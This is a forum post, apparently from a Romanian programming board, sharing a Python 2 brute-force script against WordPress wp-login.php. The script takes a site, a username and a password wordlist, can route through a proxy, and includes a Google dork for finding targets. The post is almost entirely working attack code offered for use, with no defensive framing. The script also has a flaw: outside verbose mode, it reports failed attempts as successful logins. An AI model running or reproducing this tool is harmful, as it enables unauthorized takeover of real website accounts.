Jump to content
PuRiCeL

[python] WordPress Brute Force

By PuRiCeL, in Programare

Recommended Posts

PuRiCeL Newbie

PuRiCeL

Posted
Posted 
#!/usr/bin/python
#WordPress Brute Force (wp-login.php)

#If cookies enabled brute force will not work (yet)
#Change response on line 97 if needed. (language)

#Dork: inurl:wp-login.php

#ilegalbrain
#priv8

import urllib2, sys, re, urllib, httplib, socket

print "\n   priv8 scann"
print "----------------------------------------------"

if len(sys.argv) not in [4,5,6,7]:
   print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
   print "\t   -p/-proxy <host:port> : Add proxy support"
   print "\t   -v/-verbose : Verbose Mode\n"
   sys.exit(1)

for arg in sys.argv[1:]:
   if arg.lower() == "-p" or arg.lower() == "-proxy":
      proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
   if arg.lower() == "-v" or arg.lower() == "-verbose":
      verbose = 1

try:
   if proxy:
      print "\n

    * Testing Proxy..."

      h2 = httplib.HTTPConnection(proxy)
      h2.connect()
      print "

    * Proxy:",proxy

except(socket.timeout):
   print "\n[-] Proxy Timed Out"
   proxy = 0
   pass
except(NameError):
   print "\n[-] Proxy Not Given"
   proxy = 0
   pass
except:
   print "\n[-] Proxy Failed"
   proxy = 0
   pass

try:
   if verbose == 1:
      print "

    * Verbose Mode On\n"

except(NameError):
   print "[-] Verbose Mode Off\n"
   verbose = 0
   pass

if sys.argv[1][:7] != "http://":
   host = "http://"+sys.argv[1]
else:
   host = sys.argv[1]

print "

    * BruteForcing:",host

print "

    * User:",sys.argv[2]


try:
     words = open(sys.argv[3], "r").readlines()
     print "

    * Words Loaded:",len(words),"\n"

except(IOError):
     print "[-] Error: Check your wordlist path\n"
     sys.exit(1)

for word in words:
   word = word.replace("\r","").replace("\n","")
   login_form_seq = [
        ('log', sys.argv[2]),
        ('pwd', word),
        ('rememberme', 'forever'),
        ('wp-submit', 'Login >>'),
      ('redirect_to', 'wp-admin/')]
   login_form_data = urllib.urlencode(login_form_seq)
   if proxy != 0:
      proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
      opener = urllib2.build_opener(proxy_handler)
   else:
      opener = urllib2.build_opener()
   try:
      site = opener.open(host, login_form_data).read()
   except(urllib2.URLError), msg:
      print msg
      site = ""
      pass

   if re.search("WordPress requires Cookies",site):
      print "[-] Failed: WordPress has cookies enabled\n"
      sys.exit(1)

   #Change this response if different. (language)
   if re.search("<strong>ERROR</strong>",site) and verbose == 1:
      print "[-] Login Failed:",word
   else:
      print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
      sys.exit(1)
print "\n[-] Brute Complete\n"

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...